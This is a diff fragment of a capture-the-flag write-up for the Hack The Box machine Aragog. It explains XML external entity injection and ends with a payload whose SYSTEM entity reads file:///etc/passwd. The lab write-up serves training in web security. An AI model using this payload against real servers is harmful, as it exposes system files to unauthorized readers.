Kyuu-Ji/htb-write-up/aragog/write-up-aragog.md

 Now the string between the _subnet_mask_ tag gets replaced by the variable _&example_ whose value is _Test_ and the response becomes:
 > There are 4294967294 possible hosts for Test

-With this method, it is possible to retrieve system files with the _SYSTEM_ command:
+With this method it is possible to retrieve system files with the _SYSTEM_ command:
 ```xml
 <!--?xml version="1.0" ?-->
 <!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd"> ]>